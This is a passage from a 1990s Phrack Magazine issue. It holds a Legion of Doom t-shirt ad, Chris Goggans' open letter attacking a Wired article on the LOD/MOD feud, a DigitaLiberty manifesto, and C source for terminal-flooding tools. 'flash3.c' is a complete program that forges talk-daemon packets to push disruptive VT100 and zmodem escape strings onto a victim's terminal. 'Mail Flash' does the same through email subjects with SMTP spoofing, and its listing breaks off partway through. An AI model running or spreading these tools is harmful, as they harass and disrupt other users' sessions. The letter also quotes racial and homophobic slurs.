  3362. comments/flames/general bullshit, mail it to either
  3363. jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a
  3364. last resort email address.
  3365. ciao
  3366.                                              ---Captain Hook
  3367.  
  3368. ------------------------------------------------------------------------------                         ==Phrack Magazine==
  3369.  
  3370.               Volume Six, Issue Forty-Seven, File 4 of 22
  3371.  
  3372.  
  3373.                            //   //  /\   //   ====
  3374.                           //   //  //\\ //   ====
  3375.                          ==== //  //  \\/   ====
  3376.  
  3377.                      /\   //  // \\    //  /===   ====
  3378.                     //\\ //  //   //  //   \=\   ====
  3379.                    //  \\/    \\ //  //   ===/  ====
  3380.  
  3381.                                  PART II
  3382.  
  3383. ------------------------------------------------------------------------------
  3384.  
  3385. The official Legion of Doom t-shirts are stll available!!!
  3386. Join the net luminaries world-wide in owning one of these amazing
  3387. shirts.  Impress members of the opposite sex, increase your IQ,
  3388. annoy system administrators, get raided by the government and
  3389. lose your wardrobe!
  3390.  
  3391. Can a t-shirt really do all this?  Of course it can!
  3392.  
  3393. --------------------------------------------------------------------------
  3394.  
  3395. "THE HACKER WAR  --  LOD vs MOD"
  3396.  
  3397. This t-shirt chronicles the infamous "Hacker War" between rival
  3398. groups The Legion of Doom and  The Masters of Destruction.  The front
  3399. of the shirt displays a flight map of the various battle-sites
  3400. hit by MOD and tracked by LOD.  The back of the shirt
  3401. has a detailed timeline of the key dates in the conflict, and
  3402. a rather ironic quote from an MOD member.
  3403.  
  3404. (For a limited time, the original is back!)
  3405.  
  3406. "LEGION OF DOOM  --  INTERNET WORLD TOUR"
  3407.  
  3408. The front of this classic shirt displays "Legion of Doom Internet World
  3409. Tour" as well as a sword and telephone intersecting the planet
  3410. earth, skull-and-crossbones style.  The back displays the
  3411. words "Hacking for Jesus" as well as a substantial list of "tour-stops"
  3412. (internet sites) and a quote from Aleister Crowley.
  3413.  
  3414. --------------------------------------------------------------------------
  3415.  
  3416. All t-shirts are sized XL, and are 100% cotton.
  3417.  
  3418. Cost is $15.00 (US) per shirt.  International orders add $5.00 per shirt for
  3419. postage.
  3420.  
  3421. Send checks or money orders.  Please, no credit cards, even if
  3422. it's really your card.
  3423.  
  3424.  
  3425. Name:       __________________________________________________
  3426.  
  3427. Address:    __________________________________________________
  3428.  
  3429. City, State, Zip:   __________________________________________
  3430.  
  3431.  
  3432. I want ____ "Hacker War" shirt(s)
  3433.  
  3434. I want ____ "Internet World Tour" shirt(s)
  3435.  
  3436. Enclosed is $______ for the total cost.
  3437.  
  3438.  
  3439. Mail to:   Chris Goggans
  3440.            603 W. 13th #1A-278
  3441.            Austin, TX 78701
  3442.  
  3443.  
  3444. These T-shirts are sold only as a novelty items, and are in no way
  3445. attempting to glorify computer crime.
  3446.  
  3447. ------------------------------------------------------------------------------
  3448.  
  3449. [The editor's Open Letter to Wired Magazine...they actually had the nerve
  3450.  to print it in their May issue.  Amazing...or was it?  The letter was posted
  3451.  to 10 USENET newsgroups, put on the Wired forums on AOL, Mindvox and the Well,
  3452.  sent in email to every user of wired.com, faxed to all 7 fax machines at
  3453.  Wired and sent to them registered mail.  Probably more than 5 times
  3454.  Wired's paid circulation saw it, so they HAD to print it or look foolish.
  3455.  At least, that's my take on it.  Just for overkill, here it is again.]
  3456.  
  3457. To Whom It May Concern:
  3458.  
  3459. I am writing this under the assumption that the editorial staff at
  3460. Wired will "forget" to print it in the upcoming issue, so I am
  3461. also posting it on every relevant newsgroup and online discussion forum
  3462. that I can think of.
  3463.  
  3464. When I first read your piece "Gang War In Cyberspace" I nearly choked on
  3465. my own stomach bile.  The whole tone of this piece was so far removed from
  3466. reality that I found myself questioning what color the sky must be
  3467. in Wired's universe.  Not that I've come to expect any better from Wired.
  3468. Your magazine, which could have had the potential to actually do something,
  3469. has become a parody...a politically correct art-school project that
  3470. consistently falls short of telling the whole story or making a solid point.
  3471. (Just another example of Kapor-Kash that ends up letting everyone down.)
  3472.  
  3473. I did however expect more from Josh Quittner.
  3474.  
  3475. I find it interesting that so much emphasis can be placed on an issue of
  3476. supposed racial slurs as the focus of an imaginary "gang war," especially
  3477. so many years after the fact.
  3478.  
  3479. It's also interesting to me that people keep overlooking the fact that one of
  3480. the first few members of our own little Legion of Doom was black (Paul
  3481. Muad'dib.)  Maybe if he had not died a few years back that wouldn't be
  3482. so quickly forgotten.  (Not that it makes a BIT of difference what color
  3483. a hacker is as long as he or she has a brain and a modem, or these days
  3484. at least a modem.)
  3485.  
  3486. I also find it interesting that a magazine can so easily implicate someone
  3487. as the originator of the so-called "fighting words" that allegedly sparked
  3488. this online-battle, without even giving a second thought as to the damage
  3489. that this may do to the person so named.  One would think that a magazine
  3490. would have more journalistic integrity than that (but then again, this IS
  3491. Wired, and political correctness sells magazines and satisfies advertisers.)
  3492. Thankfully, I'll only have to endure one month of the "Gee Chris, did you
  3493. know you were a racist redneck?" phone calls.
  3494.  
  3495. It's further odd that someone characterized as so sensitive to insults
  3496. allegedly uttered on a party-line could have kept the company he did.
  3497. Strangely enough, Quittner left out all mention of the MOD member who called
  3498. himself "SuperNigger."  Surely, John Lee must have taken umbrage to an
  3499. upper-middle class man of Hebrew descent so shamefully mocking him and
  3500. his entire race, wouldn't he?   Certainly he wouldn't associate in any way
  3501. with someone like that...especially be in the same group with, hang out with,
  3502. and work on hacking projects with, would he?
  3503.  
  3504. Please, of course he would, and he did.  (And perhaps he still does...)
  3505.  
  3506. The whole "racial issue" was a NON-ISSUE.  However, such things make
  3507. exciting copy and garner many column inches so keep being rehashed.  In
  3508. fact, several years back when the issue first came up, the statement was
  3509. cited as being either "Hang up, you nigger," or "Hey, SuperNigger," but
  3510. no one was sure which was actually said.  Funny how the wording changes
  3511. to fit the slant of the "journalist" over time, isn't it?
  3512.  
  3513. I wish I could say for certain which was actually spoken, but alas, I was not
  3514. privy to such things.  Despite the hobby I supposedly so enjoyed according
  3515. to Quittner, "doing conference bridges," I abhorred the things.  We used to
  3516. refer to them as "Multi-Loser Youps" (multi-user loops) and called their
  3517. denizens "Bridge Bunnies."  The bridge referred to in the story was
  3518. popularized by the callers of the 5A BBS in Houston, Texas.  (A bulletin board,
  3519. that I never even got the chance to call, as I had recently been raided by
  3520. the Secret Service and had no computer.)  Many people from Texas did call
  3521. the BBS, however, and subsequently used the bridge, but so did people from
  3522. Florida, Arizona, Michigan, New York and Louisiana.  And as numbers do in the
  3523. underground, word of a new place to hang out caused it to propagate rapidly.
  3524.  
  3525. To make any implications that such things were strictly a New York versus Texas
  3526. issue is ludicrous, and again simply goes to show that a "journalist" was
  3527. looking for more points to add to his (or her) particular angle.
  3528.  
  3529. This is not to say that I did not have problems with any of the people
  3530. who were in MOD.  At the time I still harbored strong feelings towards
  3531. Phiber Optik for the NYNEX-Infopath swindle, but that was about it.
  3532. And that was YEARS ago.  (Even I don't harbor a grudge that long.)
  3533. Even the dozen or so annoying phone calls I received in late 1990 and
  3534. early 1991 did little to evoke "a declaration of war."  Like many people,
  3535. I know how to forward my calls, or unplug the phone.  Amazing how technology
  3536. works, isn't it?
  3537.  
  3538. Those prank calls also had about as much to do with the formation of Comsec as
  3539. bubble-gum had to do with the discovery of nuclear fission.  (I'm sure if you
  3540. really put some brain power to it, and consulted Robert Anton Wilson,
  3541. you could find some relationships.)  At the risk of sounding glib, we
  3542. could have cared less about hackers at Comsec.  If there were no hackers,
  3543. or computer criminals, there would be no need for computer security
  3544. consultants.  Besides, hackers account for so little in the real picture
  3545. of computer crime, that their existence is more annoyance than something
  3546. to actually fear.
  3547.  
  3548. However, when those same hackers crossed the line and began tapping our
  3549. phone lines, we were more than glad to go after them.  This is one of my only
  3550. rules of action:  do whatever you want to anyone else, but mess with me and
  3551. my livelihood and I will devote every ounce of my being to paying you back.
  3552. That is exactly what we did.
  3553.  
  3554. This is not to say that we were the only people from the computer underground
  3555. who went to various law enforcement agencies with information about
  3556. MOD and their antics.  In fact, the number of hackers who did was staggering,
  3557. especially when you consider the usual anarchy of the underground.  None of
  3558. these other people ever get mentioned and those of us at Comsec always take
  3559. the lead role as the "narks," but we were far from alone.  MOD managed to
  3560. alienate the vast majority of the computer underground, and people reacted.
  3561.  
  3562. All in all, both in this piece, and in the book itself, "MOD, The Gang That
  3563. Ruled Cyberspace," Quittner has managed to paint a far too apologetic piece
  3564. about a group of people who cared so very little about the networks they
  3565. played in and the people who live there.  In the last 15 years that I've
  3566. been skulking around online, people in the community have always tended
  3567. to treat each other and the computers systems they voyeured with a great deal
  3568. of care and respect.  MOD was one of the first true examples of a groupthink
  3569. exercise in hacker sociopathy.  Selling long distance codes, selling credit
  3570. card numbers, destroying systems and harassing innocent people is not
  3571. acceptable behavior among ANY group, even the computer underground.
  3572.  
  3573. There have always been ego flares and group rivalries in the underground, and
  3574. there always will be.  The Legion of Doom itself was FOUNDED because of a
  3575. spat between its founder (Lex Luthor) and members of a group called The Knights
  3576. of Shadow.  These rivalries keep things interesting, and keep the community
  3577. moving forward, always seeking the newest bit of information in a series
  3578. of healthy one-upsmanship.  MOD was different.  They took things too far
  3579. against everyone, not just against two people in Texas.
  3580.  
  3581. I certainly don't condemn everyone in the group.  I don't even know
  3582. a number of them (electronically or otherwise.)  I honestly believe
  3583. that Mark Abene (Phiber) and Paul Stira (Scorpion) got royally screwed while
  3584. the group's two biggest criminals, Julio Fernandez (Outlaw) and Allen Wilson
  3585. (Wing), rolled over on everyone else and walked away free and clear.  This is
  3586. repulsive when you find out that Wing in particular has gone on to be
  3587. implicated in more damage to the Internet (as Posse and ILF) than anyone in
  3588. the history of the computing.  This I find truly disgusting, and hope that
  3589. the Secret Service are proud of themselves.
  3590.  
  3591. Imagine if I wrote a piece about the terrible treatment of a poor prisoner
  3592. in Wisconsin who was bludgeoned to death by other inmates while guards
  3593. looked away.  Imagine if I tried to explain the fact that poor Jeff Dahmer was
  3594. provoked to murder and cannibalism by the mocking of adolescent boys who teased
  3595. and called him a faggot.  How would you feel if I tried to convince you that we
  3596. should look upon him with pity and think of him as a misunderstood political
  3597. prisoner?  You would probably feel about how I do about Quittner's story.
  3598.  
  3599. 'Hacker' can just as easily be applied to "journalists" too, and with this
  3600. piece Quittner has joined the Hack Journalist Hall of Fame, taking his
  3601. place right next to Richard Sandza.
  3602.  
  3603. Quittner did get a few things right.  I do have a big cat named Spud, I do
  3604. work at a computer company and I do sell fantastic t-shirts.  Buy some.
  3605.  
  3606. With Love,
  3607.  
  3608. Chris Goggans
  3609. aka Erik Bloodaxe
  3610.  
  3611. phrack@well.com
  3612.  
  3613. ------------------------------------------------------------------------------
  3614.  
  3615. From: DigitaLiberty@phantom.com
  3616.  
  3617. Subject: Announcing - The DigitaLiberty Forum
  3618.  
  3619. PLEASE RE-DISTRIBUTE THIS AS YOU SEE FIT
  3620.  
  3621. Friends of Liberty,
  3622.  
  3623. It is becoming increasingly apparent that the arrival of cyberspace is
  3624. destined to engender a fundamental discontinuity in the course of human
  3625. relations.  This is a source of great optimism and opportunity for those of
  3626. us who believe in freedom.
  3627.  
  3628. Many of you who participate in the lively debates that take place in these
  3629. forums have seen a number of activist organizations spring up claiming  to
  3630. represent the cause of freedom.  And if you are like me you have cheered
  3631. these groups on only to watch them get bogged down in a quagmire of
  3632. realpolitics.  
  3633.  
  3634. It is a sad fact that the beast in Washington has evolved into a
  3635. self-perpetuating engine expert at co-opting the principles of even the most
  3636. ardent reformers.  Slowly but surely all those who engage the system are
  3637. ultimately absorbed into the mainstream miasma of majoritarianism.  For
  3638. example, what can be more discouraging than watching an organization that
  3639. started out as a civil liberties group shift its focus to creating new forms
  3640. of government entitlements while endorsing intrusive wiretap legislation
  3641. because they didn't want to jeopardize their influence and prestige amongst
  3642. the Washington power elite?
  3643.  
  3644. Some of us believe we can seek ultimate redress at the polls.  Many pundits
  3645. have declared our recent national elections a watershed in politics, a
  3646. turning point that represents the high water mark of big government.
  3647.  Nonsense.  The names have changed, the chairs have been rearranged, but the
  3648. game remains the same.  The so-called "choices" we are presented with are
  3649. false, hardly better than the mock one-party elections held by failed
  3650. totalitarian regimes.  There must be a better way.
  3651.  
  3652. I would like to announce the formation of a new group - DigitaLiberty - that
  3653. has chosen a different path.  We intend to bypass the existing political
  3654. process.  We reject consensus building based on the calculus of compromise.
  3655.  Instead we plan to leave the past behind, much as our pioneering forefathers
  3656. did when they set out to settle new lands.  It is our mission to create the
  3657. basis for a different kind of society.  If you would like to join us I invite
  3658. you to read the information below.
  3659.  
  3660. Yours in freedom,
  3661.  
  3662.  
  3663.  
  3664. Bill Frezza
  3665. Co-founder, DigitaLiberty
  3666. December 1994
  3667.  
  3668.  
  3669.  
  3670. ***  What is DigitaLiberty?
  3671.  
  3672. DigitaLiberty is an advocacy group dedicated to the principled defense of
  3673. freedom in cyberspace.  We intend to conduct this defense not by engaging in
  3674. traditional power politics but by setting an active, persuasive example -
  3675. creating tangible opportunities for others to join us as we construct new
  3676. global communities.  
  3677.  
  3678. We believe deeply in free markets and free minds and are convinced that we
  3679. can construct a domain in which the uncoerced choices of individuals supplant
  3680. the social compact politics of the tyranny of the majority. 
  3681.  
  3682. ***  Is DigitaLiberty a political party or a lobbying group?
  3683.  
  3684. Neither.  
  3685.  
  3686. DigitaLiberty does not seek to educate or influence politicians in the hope
  3687. of obtaining legislation favorable to our constituents.  We plan to make
  3688. politicians and legislators irrelevant to the future of network based
  3689. commerce, education, leisure, and social intercourse.
  3690.  
  3691. DigitaLiberty does not seek to persuade a majority of the electorate to adopt
  3692. views which can then be forced upon the minority.  We hope to make
  3693. majoritarianism irrelevant.  We invite only like minded individuals to help
  3694. us build the future according to our uncompromised shared values.  
  3695.  
  3696.  
  3697. *** What do you hope to accomplish?
  3698.  
  3699. DigitaLiberty is not hopeful that widespread freedom will come to the
  3700. physical world, at least not in our lifetime.  Too many constituencies depend
  3701. upon the largess and redistributive power of national governments and
  3702. therefore oppose freedom and the individual responsibility it entails.  But
  3703. we do believe that liberty can and will prevail in the virtual domains we are
  3704. building on the net and that national governments will be powerless to stop
  3705. us.  We believe that cyberspace will transcend national borders, national
  3706. cultures, and national economies.  We believe that no one will hold
  3707. sovereignty over this new realm because coercive force is impotent in
  3708. cyberspace.
  3709.  
  3710. In keeping with the self-organizing nature of on-line societies we believe we
  3711. will chose to invent new institutions to serve our varied economic and social
  3712. purposes.  DigitaLiberty intends to be in the forefront of the discovery and
  3713. construction of these institutions.  
  3714.  
  3715. ***  But what about the construction of the "Information Superhighway"?
  3716.  
  3717. The fabric of cyberspace is rapidly being built by all manner of entities
  3718. espousing the full range of political and economic philosophies.   While
  3719. political activity can certainly accelerate or retard the growth of the net
  3720. in various places and times it cannot stop it nor can it effectively control
  3721. how the net will be used.  
  3722.  
  3723. Our focus is not on the institutions that can and will impact the building of
  3724. the physical "information highway" but on those that will shape life on the
  3725. net as an ever increasing portion of our productive activities move there.
  3726.  
  3727. ***  What makes you think cyberspace will be so different?
  3728.  
  3729. The United States of America was the only country in history ever to be built
  3730. upon an idea.  Unfortunately, this idea was lost as we slowly traded away our
  3731. liberties in exchange for the false promise of security.
  3732.  
  3733. DigitaLiberty believes that technology can set us free.  The economies of the
  3734. developed world are now making a major transition from an industrial base to
  3735. an information base.  As they do, the science of cryptology will finally and
  3736. forever guarantee the unbreachable right of privacy, protecting individuals,
  3737. groups, and corporations from the prying eyes and grasping hands of
  3738. sovereigns.  We will all be free to conduct our lives, and most importantly
  3739. our economic relations, as we each see fit.  
  3740.  
  3741. Cyberspace is also infinitely extensible.   There will be no brutal
  3742. competition for lebensraum.  Multiple virtual communities can exist side by
  3743. side and without destructive conflict, each organized according to the
  3744. principles of their members.  We seek only to build one such community, a
  3745. community based on individual liberty.  Others are free to build communities
  3746. based on other principles, even diametrically opposed principles.  But they
  3747. must do so without our coerced assistance.
  3748.  
  3749. Effective communities will thrive and grow.  Dysfunctional communities will
  3750. wither and die.  And for the first time in human history, rapacious societies
  3751. will no longer have the power to make war on their neighbors nor can bankrupt
  3752. communities take their neighbors down with them.  
  3753.  
  3754. ***  What does this have to do with my real life?  I can't eat data.  I don't
  3755. live in a computer.
  3756.  
  3757. Yes, but imagine the ultimate impact of mankind's transition from an agrarian
  3758. economy to an industrial economy to an information economy.  Our founding
  3759. fathers would have consider anyone insane who predicted that a nation of 250
  3760. million could feed itself with fewer than 3% of its citizens involved in
  3761. agriculture.  Similarly, economists and politicians trapped in the policies
  3762. of the past lament our move from a manufacturing economy to a knowledge
  3763. worker and service based economy.  We see this as a cause to rejoice.
  3764.  
  3765. The day will come when fewer than 5% of the citizens of a nation of 1 billion
  3766. will be involved in manufacturing - if we still bother calling geographically
  3767. defined entities "nations".  What will the rest of us be doing?  We will be
  3768. providing each other with an exploding array of services and we will be
  3769. creating, consuming, and exchanging information.  Most of this will occur
  3770. entirely within or be mediated at least in part by our activities in
  3771. cyberspace.  
  3772.  
  3773. Many of us will earn a very good living on the net.  Our race, our religion,
  3774. our gender, our age, our physical appearance and limitations will all be
  3775. irrelevant and undetectable.  Hard working individuals from underdeveloped
  3776. nations who in the past might have been forced to emigrate in search of
  3777. economic freedom and opportunity can now build productive lives in
  3778. cyberspace.  And much if not all of the wealth we create that we do not
  3779. transform into visible physical assets will be ours to keep and use, beyond
  3780. the grasp of sovereigns.  
  3781.  
  3782. *** What is the purpose of this forum?
  3783.  
  3784. The DigitaLiberty Forum is a place where like minded individuals can share
  3785. their views, observations, and strategies related to the development of
  3786. virtual communities based on freedom.  It is a place where people can
  3787. exchange information and advice about how they have developed
  3788. extra-territorial business and social relationships  - away from the
  3789. influence and outside the jurisdiction of governments.  It is a forum for the
  3790. posting of essays, questions, and ideas on the topic of liberty.  It is a
  3791. place where we can meet and debate the forms that our  new institutions might
  3792. take and discuss the practical problems and responsibilities that freedom
  3793. entail.
  3794.  
  3795. In time as our technology matures some of us will move on to more ambitious
  3796. projects, launch other programs, and begin our virtual migration from the
  3797. swamp of coerced collectivism.  Best of all, there will be no need to
  3798. physically move to 'Galt's Gulch' or escape to a floating 'Freedonia'.  We
  3799. can all participate in this exodus without hastily quitting our jobs or
  3800. disrupting our lives.  And as a larger and larger portion of our economic and
  3801. social activities move onto the net we will create a new society, open to all
  3802. with the will to enter.  This new world will be interleaved with the physical
  3803. world in which we now live and yet will be separate.  And free.
  3804.  
  3805. Join us as we begin the journey.
  3806.  
  3807. *** Who can join DigitaLiberty?
  3808.  
  3809. The DigitaLiberty Forum is open to anyone that can honestly answer yes to the
  3810. following two questions:
  3811.  
  3812. 1)  I renounce the use of coercive force as a tool of social or economic
  3813. policy.
  3814.  
  3815. 2)  I do not derive the majority of my income from funds taken from
  3816. taxpayers.
  3817.  
  3818. *** How do I join DigitaLiberty?
  3819.  
  3820. If you qualify, send a message to DigitaLiberty-request@phantom.com with the
  3821. words "SUBSCRIBE" in the subject line and the message body as follows
  3822.  
  3823. SUBSCRIBE DigitaLiberty <your name>
  3824.  
  3825. And welcome to the future.
  3826.  
  3827. ###
  3828.  
  3829. ------------------------------------------------------------------------------
  3830. /* flash3.c */
  3831.  
  3832. /* 
  3833.    Modified from the original by Vassago. Superflash mods unknown.
  3834.    Try the PhoEniX FTP Site: wentz21.reslife.okstate.edu in /pub.
  3835. */
  3836.  
  3837. /* 
  3838.     This little program is intended to quickly mess up a user's
  3839.     terminal by issuing a talk request to that person and sending
  3840.     vt100 escape characters that force the user to logout or kill
  3841.     his/her xterm in order to regain a sane view of the text.
  3842.     It the user's message mode is set to off (mesg n) he/she will
  3843.     be unharmed. 
  3844.  
  3845.     Try compiling with: gcc -o flash flash3.c
  3846.  
  3847.     Usage: flash user@host [<level>]
  3848.    
  3849.     Level is either the number or the word for these:
  3850.       1)  BASIC  - Old flash, no zmodem. 
  3851.       2)  ZMODEM - Old with ZModem.
  3852.       3)  KILLER - 99 ZModem flashes. 
  3853. */
  3854.  
  3855. #include <sys/types.h>
  3856. #include <sys/socket.h>
  3857. #include <netinet/in.h>
  3858. #include <netdb.h>
  3859. #include <stdio.h>
  3860. #include <strings.h>
  3861. #include <string.h>
  3862. #include <ctype.h>
  3863.  
  3864. #define BASIC  1
  3865. #define ZMODEM 2
  3866. #define KILLER 3
  3867.  
  3868. #define FIRST "\033(0\033#8" 
  3869. #define SECOND "\033[1;3r"
  3870. #define THIRD  "\033[1;5m\033(0"
  3871. #define FOURTH "**\030B00"
  3872. #define FIFTH  "\033**EMSI_IRQ8E08"
  3873.  
  3874. /* Comment this to remove the debugging message... */
  3875. #define INFOMESSAGE
  3876.  
  3877. /* this should really be in an include file..  */
  3878.  
  3879. #define OLD_NAME_SIZE 9
  3880. #define NAME_SIZE    12
  3881. #define TTY_SIZE     16 
  3882. typedef struct {
  3883.     char    type;
  3884.     char    l_name[OLD_NAME_SIZE];
  3885.     char    r_name[OLD_NAME_SIZE];
  3886.     char    filler;
  3887.     u_long  id_num;
  3888.     u_long  pid;
  3889.     char    r_tty[TTY_SIZE];
  3890.     struct  sockaddr_in addr;
  3891.     struct  sockaddr_in ctl_addr;
  3892. } OLD_MSG;
  3893.  
  3894. typedef struct {
  3895.     u_char  vers;
  3896.     char    type;
  3897.     u_short filler;
  3898.     u_long  id_num;
  3899.     struct  sockaddr_in addr;
  3900.     struct  sockaddr_in ctl_addr;
  3901.     long    pid;
  3902.     char    l_name[NAME_SIZE];
  3903.     char    r_name[NAME_SIZE];
  3904.     char    r_tty[TTY_SIZE];
  3905. } CTL_MSG;
  3906.  
  3907. int seed = 0x2837;
  3908.  
  3909. #define TALK_VERSION    1               /* protocol version */
  3910.  
  3911. /* Types */
  3912. #define LEAVE_INVITE    0
  3913. #define LOOK_UP         1
  3914. #define DELETE          2
  3915. #define ANNOUNCE        3
  3916.  
  3917. int     current = 1;    /* current id..  this to avoid duplications */
  3918.  
  3919. struct sockaddr_in *getinaddr(char *hostname, u_short port)
  3920. {
  3921. static  struct sockaddr    addr;
  3922. struct  sockaddr_in *address;
  3923. struct  hostent     *host;
  3924.  
  3925. address = (struct sockaddr_in *)&addr;
  3926. (void) bzero( (char *)address, sizeof(struct sockaddr_in) );
  3927. /* fill in the easy fields */
  3928. address->sin_family = AF_INET;
  3929. address->sin_port = htons(port);
  3930. /* first, check if the address is an ip address */
  3931. address->sin_addr.s_addr = inet_addr(hostname);
  3932. if ( (int)address->sin_addr.s_addr == -1)
  3933.     {
  3934.     /* it wasn't.. so we try it as a long host name */
  3935.     host = gethostbyname(hostname);
  3936.     if (host)
  3937.         {
  3938.         /* wow.  It's a host name.. set the fields */
  3939.         /* ?? address->sin_family = host->h_addrtype; */
  3940.         bcopy( host->h_addr, (char *)&address->sin_addr,
  3941.             host->h_length);
  3942.         }
  3943.     else
  3944.         {
  3945.         /* oops.. can't find it.. */
  3946.         puts("Flash aborted, could not find address."); 
  3947.         exit(-1);
  3948.         return (struct sockaddr_in *)0;
  3949.         }
  3950.     }
  3951. /* all done. */
  3952. return (struct sockaddr_in *)address;
  3953. }
  3954.  
  3955. SendTalkPacket(struct sockaddr_in *target, char *p, int psize) 
  3956. {
  3957. int     s;
  3958. struct sockaddr sample; /* not used.. only to get the size */
  3959.  
  3960. s = socket(AF_INET, SOCK_DGRAM, 0);
  3961. sendto( s, p, psize, 0,(struct sock_addr *)target, sizeof(sample) ); 
  3962.  
  3963.  
  3964. new_ANNOUNCE(char *hostname, char *remote, char *local)
  3965. {
  3966. CTL_MSG  packet; 
  3967. struct   sockaddr_in  *address;
  3968.  
  3969. /* create a packet */
  3970. address = getinaddr(hostname, 666 );  
  3971. address->sin_family = htons(AF_INET); 
  3972.  
  3973. bzero( (char *)&packet, sizeof(packet) );
  3974. packet.vers   = TALK_VERSION; 
  3975. packet.type   = ANNOUNCE;   
  3976. packet.pid    = getpid();
  3977. packet.id_num = current;
  3978. bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) ); 
  3979. bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
  3980. strncpy( packet.l_name, local, NAME_SIZE); 
  3981. strncpy( packet.r_name, remote, NAME_SIZE); 
  3982. strncpy( packet.r_tty, "", 1); 
  3983.  
  3984. SendTalkPacket( getinaddr(hostname, 518), (char *)&packet, sizeof(packet) ); 
  3985. }
  3986.  
  3987. old_ANNOUNCE(char *hostname, char *remote, char *local)
  3988. {
  3989. OLD_MSG  packet;
  3990. struct   sockaddr_in  *address;
  3991.  
  3992. /* create a packet */
  3993. address = getinaddr(hostname, 666 );
  3994. address->sin_family = htons(AF_INET);
  3995.  
  3996. bzero( (char *)&packet, sizeof(packet) );
  3997. packet.type   = ANNOUNCE;
  3998. packet.pid    = getpid();
  3999. packet.id_num = current;
  4000. bcopy( (char *)address, (char *)&packet.addr, sizeof(packet.addr ) );
  4001. bcopy( (char *)address, (char *)&packet.ctl_addr, sizeof(packet.ctl_addr));
  4002. strncpy( packet.l_name, local, NAME_SIZE);
  4003. strncpy( packet.r_name, remote, NAME_SIZE);
  4004. strncpy( packet.r_tty, "", 1);
  4005.  
  4006. SendTalkPacket( getinaddr(hostname, 517), (char *)&packet, sizeof(packet) );
  4007. }
  4008.  
  4009. int rnd()
  4010. {
  4011.   seed *=0x1243;
  4012.   seed = seed & 0xFFFF;
  4013.   seed +=1;
  4014.   while(seed>10000)seed-=10000;
  4015.   return(seed);
  4016. }
  4017.  
  4018.  
  4019. pop(char *hostname, char *username, char *flashstring)
  4020. {
  4021.   char newflashstr[80];
  4022.   int e = rnd();
  4023.   sprintf(newflashstr,"%d%s",e,flashstring); 
  4024.   new_ANNOUNCE(hostname, username, newflashstr); 
  4025.   old_ANNOUNCE(hostname, username, newflashstr);
  4026. }    
  4027.  
  4028. flash(int type, char *hostname, char *username)
  4029. {
  4030.      char firestring[10];
  4031.      int x,y;
  4032.  
  4033.      current=0;
  4034.      if (type == 3) y = 14;
  4035.      else y = 1;
  4036.  
  4037.      for(x=0;x<y;x++)    
  4038.      {
  4039.     current++;
  4040.     pop(hostname, username, FIRST);
  4041.     current++; 
  4042.     pop(hostname, username, SECOND);
  4043.     current++;
  4044.     pop(hostname, username, THIRD); 
  4045.     if(type>1)
  4046.     {
  4047.       current++;
  4048.       pop(hostname, username, FOURTH); 
  4049.       current++;
  4050.       pop(hostname, username, FIFTH); 
  4051.       current++;
  4052.       pop(hostname, username, FOURTH);
  4053.     }
  4054.     current++;
  4055.     pop(hostname, username, FIRST); 
  4056.      }
  4057.     return(current);
  4058. }
  4059.  
  4060. GetType(char *TypeStr)
  4061. {
  4062.     if (strcmp(TypeStr,"basic")==0)
  4063.         return(1);
  4064.     else if (strcmp(TypeStr,"zmodem")==0)
  4065.         return(2);
  4066.     else if (strcmp(TypeStr,"killer")==0)
  4067.         return(3);
  4068.     else if (strcmp(TypeStr,"1")==0)
  4069.         return(1);
  4070.     else if (strcmp(TypeStr,"2")==0)
  4071.         return(2);
  4072.     else if (strcmp(TypeStr,"3")==0)
  4073.         return(3);
  4074. }    
  4075.  
  4076. main(int argc, char *argv[])
  4077. {
  4078.     char    *hostname, *username; 
  4079.     int     pid,type,name;
  4080.  
  4081.  
  4082.     if ( (pid = fork()) == -1)  
  4083.         {
  4084.         perror("fork()");
  4085.         exit(-1);
  4086.         }
  4087.     if ( !pid )
  4088.         {
  4089.         exit(0);
  4090.         }
  4091.     if (argc < 2) { 
  4092.         puts("USAGE: flash user@host [<flash type>]");
  4093.         puts("Types are: 1) basic, 2) zmodem, 3) killer.");
  4094.         puts("Default flash type is zmodem.");
  4095.         exit(5);
  4096.     }
  4097.     if (argc >= 3) {
  4098.         type=GetType(argv[argc-1]);
  4099.         if(type<1||type>3)type=ZMODEM;
  4100.     }
  4101.     else type=ZMODEM;   /* default */
  4102.  
  4103.     for(name=1; name<argc-1; name++)
  4104.     {
  4105.     username = argv[name]; 
  4106.     if ( (hostname = (char *)strchr(username, '@')) == NULL )       
  4107.         {
  4108.         puts("Aborted, invalid name.  ");
  4109.         exit(-1);
  4110.         }
  4111.     *hostname = '\0'; 
  4112.     hostname++; 
  4113.  
  4114.     if (*username == '~') 
  4115.         username++; 
  4116. #ifdef INFOMESSAGE
  4117.             printf("Sending a type #%d flash to %s@%s. (%d messages)\n",
  4118.             type,username,hostname,
  4119.             flash(type,hostname,username));
  4120. #else
  4121.     flash(type,hostname,username);
  4122. #endif
  4123.     sleep(1);
  4124.     }
  4125. }
  4126.  
  4127.  
  4128. ------------------------------------------------------------------------------
  4129.  
  4130. /*
  4131.  
  4132.   Mail Flash - (C) 1994 CHA0S All Rights Reserved
  4133.   
  4134.   This is a simple program which demonstrates the problem with certain
  4135.   parts of VT100 emulation.  Previously similar programs made use
  4136.   of talkd, but a user could stop attempts by simply entering
  4137.   "mesg n".  This program sends the "flash" string which will really
  4138.   screw over a terminal in the SUBJECT header of e-mail.  E-Mail readers
  4139.   such as pine show you this before you can decide to even delete the mail!
  4140.   
  4141.   Support has been added to choose your own SMTP server for neat-o hostname
  4142.   spoofing.  (krad!)
  4143.   
  4144. */  
  4145.  
  4146. #include <stdio.h>
  4147. #include <sys/param.h>
  4148. #include <sys/socket.h>
  4149. #include <netinet/in.h>
  4150. #include <netdb.h>
  4151. #include <stdarg.h>
  4152.  
  4153. void smtp_connect(char *server);
  4154.  
  4155. int thesock; /* the socket */
  4156.  
  4157. void smtp_connect(char *server)
  4158. {
  4159.   struct sockaddr_in sin;
  4160.   struct hostent *hp;
  4161.   
  4162.   hp = gethostbyname(server);
  4163.   if (hp==NULL) {
  4164.     printf("Unknown host: %s\n",server);
  4165.     exit(0);
  4166.   }
  4167.   bzero((char*) &sin, sizeof(sin));
  4168.   bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  4169.   sin.sin_family = hp->h_addrtype;
  4170.   sin.sin_port = htons(25);
  4171.   thesock = socket(AF_INET, SOCK_STREAM, 0);
